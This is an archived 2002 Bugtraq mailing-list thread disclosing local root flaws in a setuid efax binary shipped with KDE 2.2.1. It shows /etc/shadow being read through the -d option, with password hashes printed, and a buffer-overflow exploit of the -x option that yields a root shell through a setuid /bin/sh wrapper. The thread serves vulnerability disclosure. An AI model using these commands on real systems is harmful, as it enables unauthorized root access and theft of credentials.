[23888] in bugtraq
Re: efax
daemon@ATHENA.MIT.EDU (H D Moore)
Wed Jan 16 21:18:53 2002
Message-ID: <20020116095328.1877.qmail@securityfocus.com>
Content-Type: text/plain;
charset="iso-8859-1"
From: H D Moore <sflist@digitaloffense.net>
To: "Wodahs Latigid" <wodahs@mail.com>
Date: Wed, 16 Jan 2002 03:55:27 -0600
Cc: bugtraq@securityfocus.com, vuln-dev@securityfocus.com
In-Reply-To: <20020116090324.77325.qmail@mail.com>
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Since this is getting cc'd to butraq, here is a little background:
The version of efax I have was part of a kde-2.2.1 source build and install.
The efax program was shipped as part of the klprfax app in the kdeutils
package. The makefile sets this binary to be setuid root on install:
hdm@sliver:~/kdeutils-2.2.1/klprfax > grep chown . -r
./efax/fax: case $OWNER in '') ;; *) chown $OWNER /dev/$DEV ;; esac
./efax/Makefile: @(chown root $(bindir)/efax && chmod 4755 $(bindir)/efax) || echo "Was not able to make efax setuid root"
./efax/Makefile.am: @(chown root $(bindir)/efax && chmod 4755 $(bindir)/efax) || echo "Was not able to make efax setuid root"
./efax/Makefile.in: @(chown root $(bindir)/efax && chmod 4755 $(bindir)/efax) || echo "Was not able to make efax setuid root"
./klprfax/klprfax_lpd.in: chown root $SPOOL/klprfax
./klprfax/klprfax_lpd: chown root $SPOOL/klprfax
hdm@sliver:~/kdeutils-2.2.1/klprfax >
This has been fixed in KDE 2.2.2 and I have not seen a distro yet that ships
with efax installed suid root. However, if you installed KDE 2.2.1 from source,
then there is a good chance your efax binary is still setuid.
I posted a message to vuln-dev, stating that I found a setuid copy of efax and
that I was able to read arbitrary files with the -d parameter (/etc/shadow),
Wodahs responded saying he found an overflow in the -x parameter.
The overflow that he found is easily exploitable:
Running /bin/id:
hdm@sliver> efax -x $EX
efax: Wed Jan 16 03:43:10 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: Wed Jan 16 03:43:10 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: 43:10 compiled Aug 16 2001 10:23:23
efax: 43:10 Error: can't open pre-lock file <nops>^)FF
S
̀)@̀/bin/idA/TMP..08795: File name too long
uid=500(hdm) gid=100(users) euid=0(root) groups=100(users)
Getting a root shell:
hdm@sliver > echo 'void main(void){setuid(0);system("/bin/sh");}' > /tmp/ex.c
hdm@sliver > gcc -o /tmp/ex /tmp/ex.c
/tmp/ex.c: In function `main':
/tmp/ex.c:1: warning: return type of `main' is not `int'
hdm@sliver > export EX=`perl genshell.pl 1029 $ADDR`
shell code is: 43 bytes
hdm@sliver > efax -x $EX
efax: Wed Jan 16 03:46:21 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: Wed Jan 16 03:46:21 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: 46:21 compiled Aug 16 2001 10:23:23
efax: 46:21 Error: can't open pre-lock file <nops>^)FF
S
̀)@̀/tmp/exA/TMP..08846: File name too long
sh-2.04#
On Wednesday 16 January 2002 03:03 am, Wodahs Latigid wrote:
> I found a buffer overflow in efax a while back,
> reported it and didn't get a response. Here's
> the original email:
> -----------------------------------------------
> To: edc@cce.com
> Subject: Efax Buffer Overflow
> You may or not be interested (as this has no
> major impact on the outside world), but there
> is a buffer overflow in the -x function of
> efax. Obviously, efax should not be setuid
> root, but I can imagine a situation with an
> administrator doing so to give "trusted" users
> access to the fax facility.
> -----------------------------------------------
>
> And here's more detail:
>
> # cat /etc/mandrake-release
> Linux Mandrake release 8.0 (Traktopel) for i586
>
> Starting program: /usr/bin/efax -x `perl -e "print 'A' x 1200"`
> /usr/bin/efax: Wed Jan 16 09:54:49 2002 efax v 0.9 Copyright 1999 Ed Casas
> efax: 54:49 Error: can't open pre-lock file AAAA..[A's
> Cut]..AAAATMP..25717: File name too long Program received signal SIGSEGV,
> Segmentation fault.
> 0x41414141 in ?? ()
> (gdb) inf reg
> .. stuff cut ..
> edx 0x65656565 1701143909
> ebx 0x41414141 1094795585
> esp 0xbffefd58 0xbffefd58
> ebp 0x41414141 0x41414141
> esi 0x41414141 1094795585
> edi 0x41414141 1094795585
> eip 0x41414141 0x41414141
> .. stuff cut ..
>
> Digital Shadow
> http://www.ministryofpeace.co.uk/
>
>
>
> -----Original Message-----
> From: H D Moore <sflist@digitaloffense.net>
> Date: Tue, 15 Jan 2002 18:44:57 -0600
> To: VULN-DEV@SECURITYFOCUS.COM
> Subject: efax
>
> > Didn't see this mentioned before...
> >
> > hdm@sliver:~ > which efax
> > /opt/kde2/bin/efax
> > hdm@sliver:~ > ls -la /opt/kde2/bin/efax
> > -rwsr-xr-x 1 root root 96689 Aug 16 10:23
> > /opt/kde2/bin/efax hdm@sliver:~ > efax -h
> > efax: Tue Jan 15 18:43:28 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
> > efax: Tue Jan 15 18:43:28 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
> > efax: 43:28 compiled Aug 16 2001 10:23:23
> > efax: 43:28 Error: no argument for (-h)
> > Usage:
> > efax [ option ]... [ -t num [ file... ] ]
> > Options:
> > -a str use command ATstr to answer
> > -c cap set modem and receive capabilites to cap
> > -d dev use modem on device dev
> > -e cmd exec "/bin/sh -c cmd" for voice calls
> > -f fnt use (PBM) font file fnt for headers
> > -g cmd exec "/bin/sh -c cmd" for data calls
> > -h hdr use page header hdr (use %d's for current page/total pages)
> > -i str send modem command ATstr at start
> > -j str send modem command ATstr after set fax mode
> > -k str send modem command ATstr when done
> > -l id set local identification to id
> > -o opt use protocol option opt:
> > 0 use class 2.0 instead of class 2 modem commands
> > 1 use class 1 modem commands
> > 2 use class 2 modem commands
> > a if first [data mode] answer attempt fails retry as fax
> > e ignore errors in modem initialization commands
> > f use virtual flow control
> > h use hardware flow control
> > l halve lock file polling interval
> > n ignore page retransmission requests
> > r do not reverse received bit order for Class 2 modems
> > x use XON instead of DC2 to trigger reception
> > z add 100 ms to pause before each modem comand (cumulative)
> > -q ne ask for retransmission if more than ne errors per page
> > -r pat save received pages into files pat.001, pat.002, ...
> > -s share (unlock) modem device while waiting for call
> > -v lvl print messages of type in string lvl (ewinchamr)
> > -w don't answer phone, wait for OK or CONNECT instead
> > -x fil use uucp-style lock file fil
> > Commands:
> > -t dial num and send fax image files file...
> > efax: 43:28 done, returning 2 (unrecoverable error)
> > hdm@sliver:~ > efax -d /etc/shadow
> > efax: Tue Jan 15 18:43:35 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
> > efax: Tue Jan 15 18:43:35 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
> > efax: 43:35 compiled Aug 16 2001 10:23:23
> > efax: 43:35 opened /etc/shadow
> > efax: 43:35 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for
> > device efax: 43:35 Warning: unexpected response
> > "root:sjSs9mscTsosA:11521:0:10000::::" efax: 43:35 Warning: unexpected
> > response "bin:*:8902:0:10000::::" efax: 43:35 Warning: unexpected
> > response "daemon:*:8902:0:10000::::" efax: 43:35 Warning: unexpected
> > response "lp:*:9473:0:10000::::" efax: 43:35 Warning: unexpected response
> > "news:*:8902:0:10000::::" efax: 43:35 Warning: unexpected response
> > "uucp:*:0:0:10000::::"
> > efax: 43:35 Warning: unexpected response "games:*:0:0:10000::::"
> > efax: 43:35 Warning: unexpected response "man:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "at:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "lnx:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "mdom:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "yard:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "wwwrun:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "squid:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "postgres:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "fax:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "gnats:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "empress:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "adabas:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "amanda:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "ixess:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "irc:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "ftp:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "firewall:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "informix:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "named:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "virtuoso:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "fnet:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "gdm:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "postfix:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "cyrus:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "nps:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "skyrix:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "dbmaker:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "fixadm:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "fib:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "fixlohn:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "mysql:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "dpbox:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "ingres:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "codadmin:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "zope:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "vscan:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "wnn:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "pop:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "perforce:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "nobody:*:0:0:10000::::"
> > efax: 43:35 Warning: unexpected response
> > "hdm:snBsN0stfzsMg:11564:0:99999:7:0::" efax: 43:35 Warning: unexpected
> > response "oracle:!:11556:0:99999:3:0::" efax: 43:35 Warning: unexpected
> > response "yaku:!:11636:0:99999:3:0::" efax: 43:35 Error: tcgetattr on
> > fd=3 failed: Inappropriate ioctl for device efax: 43:35 sync: dropping
> > DTR
> > efax: 43:35 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for
> > device efax: 43:36 Error: tcgetattr on fd=3 failed: Inappropriate ioctl
> > for device efax: 43:36 Error: tcgetattr on fd=3 failed: Inappropriate
> > ioctl for device efax: 43:36 sync: sending escapes
> > efax: 43:36 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for
> > device efax: 43:36 Error: tcgetattr on fd=3 failed: Inappropriate ioctl
> > for device efax: 43:37 Error: sync: modem not responding
> > efax: 43:37 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for
> > device efax: 43:37 done, returning 2 (unrecoverable error)
> >
> > --
> > H D Moore
> > http://www.digitaldefense.net - work
> > http://www.digitaloffense.net - play
--
H D Moore
http://www.digitaldefense.net - work
http://www.digitaloffense.net - play
